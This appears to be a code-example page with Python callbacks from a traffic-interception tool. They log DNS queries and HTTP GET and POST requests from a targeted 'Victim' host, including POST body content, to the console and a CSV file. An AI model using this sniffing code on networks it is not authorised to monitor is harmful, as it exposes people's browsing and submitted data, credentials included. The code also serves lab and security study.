Beispiel #1
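def dns_sniff_request(pkt):
	"""Log a DNS query sent by the host identified by V_IP / V_MAC.

	Ignored without output: packets where the IP or Ethernet source cannot
	be read, packets from any other source address, packets without a DNS
	layer, DNS responses (qr != 0) and DNS messages that carry no readable
	question name.  A matching query is printed with a timestamp and, when
	SAVE_FILE_PATH is not empty, passed to utils.save_to_csv_file as one row.

	The queried name is copied from the packet and is therefore untrusted
	input.  It is decoded for display but not filtered in this function.
	NOTE(review): confirm that utils.save_to_csv_file escapes control
	characters and spreadsheet formula prefixes; its body is not visible here.

	Args:
		pkt: captured packet exposing getlayer() and haslayer().
	"""
	# Reading .src fails with AttributeError when a layer is absent; such
	# packets are skipped, as before.
	try:
		src_ip = pkt.getlayer(IP).src
		src_mac = pkt.getlayer(Ether).src
	except AttributeError:
		return

	if src_ip != V_IP or src_mac != V_MAC or not pkt.haslayer(DNS):
		return
	dns_layer = pkt.getlayer(DNS)
	if dns_layer.qr != 0:
		return

	# A DNS message without a question section has no qname; the original
	# dereferenced it unconditionally and let AttributeError escape the callback.
	qname = getattr(dns_layer.qd, "qname", None)
	if qname is None:
		return
	# The name may arrive as bytes (depends on the capture library / Python
	# version); str + bytes raises TypeError, so decode before building the line.
	if isinstance(qname, bytes):
		qname = qname.decode("utf-8", errors="replace")

	date = datetime.now().strftime("[%Y-%m-%d %H:%M:%S]")
	print(
		date
		+ " Service: DNS"
		+ " Victim: "
		+ src_ip
		+ " ("
		+ src_mac
		+ ") is resolving "
		+ qname
	)
	if SAVE_FILE_PATH != "":
		utils.save_to_csv_file(
			[date, src_ip, src_mac, "DNS request", qname],
			SAVE_FILE_PATH,
		)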
Beispiel #2
def http_sniff_get_request(pkt):
	"""Report an HTTP GET request sent to TCP port 80 by the host V_IP / V_MAC.

	A trace marker is printed on every call.  Only packets with a TCP layer
	whose destination port is 80 are examined; anything else is ignored.
	The TCP layer is stringified and scanned line by line (CRLF separated):

	* the token that follows any token containing "GET" becomes the path,
	* the second space-separated token of any line containing "Host:"
	  becomes the host.

	Matching is by substring and later matches overwrite earlier ones.  If
	the packet's source IP and MAC equal V_IP and V_MAC and a path was found,
	a timestamped line is printed and, when SAVE_FILE_PATH is not empty, the
	same fields are passed to utils.save_to_csv_file.

	Host and path are taken from the packet unchanged; this function applies
	no escaping before they reach the terminal or the CSV writer.
	NOTE(review): confirm that utils.save_to_csv_file neutralises control
	characters and spreadsheet formula prefixes; its body is not visible here.

	Args:
		pkt: captured packet exposing getlayer() and haslayer().
	"""
	print("http_get_req")
	if not (pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80):
		return

	# Any IndexError below (a "GET" or "Host:" match with no following
	# token, or one raised further down) ends the call silently.
	try:
		segment_text = str(pkt.getlayer(TCP))
		get_request = ""
		host_request = ""
		for header_line in segment_text.split("\r\n"):
			if "GET" in header_line:
				tokens = header_line.split(" ")
				for position, token in enumerate(tokens):
					if "GET" in token:
						get_request = tokens[position + 1]
			if "Host:" in header_line:
				host_request = header_line.split(" ")[1]

		# Packets without readable IP / Ethernet source fields are dropped.
		try:
			src_ip = pkt.getlayer(IP).src
			src_mac = pkt.getlayer(Ether).src
		except AttributeError:
			return

		# Report only traffic from the configured host that carried a path.
		if src_ip != V_IP or src_mac != V_MAC or get_request == "":
			return

		date = datetime.now().strftime("[%Y-%m-%d %H:%M:%S]")
		document = host_request + get_request
		console_line = (
			date
			+ " Service: HTTP_GET"
			+ " Victim: "
			+ src_ip
			+ " ("
			+ src_mac
			+ ") is requiring document: "
			+ document
		)
		print(console_line)
		if SAVE_FILE_PATH != "":
			csv_row = [date, src_ip, src_mac, "HTTP_GET request", document]
			utils.save_to_csv_file(csv_row, SAVE_FILE_PATH)
	except IndexError:
		return
def http_sniff_post_request(pkt):
    """Report an HTTP POST request sent to TCP port 80 by the host V_IP / V_MAC.

    A trace marker is printed on every call.  Only packets with a TCP layer
    whose destination port is 80 are examined; anything else is ignored.
    The TCP layer is stringified and scanned line by line (CRLF separated):

    * the token that follows any token containing "POST" becomes the path,
    * the second space-separated token of any line containing "Host:"
      becomes the host,
    * the line right after the first empty line is kept as the content.

    Matching is by substring and later matches overwrite earlier ones.  If
    the packet's source IP and MAC equal V_IP and V_MAC and a path was found,
    a timestamped line is printed and, when SAVE_FILE_PATH is not empty, the
    same fields are passed to utils.save_to_csv_file.

    Host, path and content are taken from the packet unchanged; this function
    applies no escaping or redaction before they reach the terminal or the
    CSV writer, so the output may hold whatever the request carried.
    NOTE(review): confirm that utils.save_to_csv_file neutralises control
    characters and spreadsheet formula prefixes; its body is not visible here.

    Args:
        pkt: captured packet exposing getlayer() and haslayer().
    """
    print("http_post_req")
    if not (pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80):
        return

    # Any IndexError below (a match with no following token, an empty line
    # that is the last line, or one raised further down) ends the call silently.
    try:
        segment_lines = str(pkt.getlayer(TCP)).split("\r\n")
        post_request = ""
        host_request = ""
        post_content = ""
        separator_seen = False
        for line_no, text in enumerate(segment_lines):
            if "POST" in text:
                tokens = text.split(" ")
                for position, token in enumerate(tokens):
                    if "POST" in token:
                        post_request = tokens[position + 1]
            if "Host:" in text:
                host_request = text.split(" ")[1]
            # Only the first empty line counts as the header/body separator.
            if not separator_seen and text == "":
                separator_seen = True
                post_content = segment_lines[line_no + 1]

        # Packets without readable IP / Ethernet source fields are dropped.
        try:
            src_ip = pkt.getlayer(IP).src
            src_mac = pkt.getlayer(Ether).src
        except AttributeError:
            return

        # Report only traffic from the configured host that carried a path.
        if src_ip != V_IP or src_mac != V_MAC or post_request == "":
            return

        date = datetime.now().strftime("[%Y-%m-%d %H:%M:%S]")
        document = host_request + post_request
        console_line = (
            date
            + " Service: HTTP_POST"
            + " Victim: "
            + src_ip
            + " ("
            + src_mac
            + ")"
            + " is sending document: "
            + document
            + " Content:"
            + post_content
        )
        print(console_line)
        if SAVE_FILE_PATH != "":
            details = "POST location:" + document + " Content:" + post_content
            csv_row = [date, src_ip, src_mac, "HTTP_POST request", details]
            utils.save_to_csv_file(csv_row, SAVE_FILE_PATH)
    except IndexError:
        return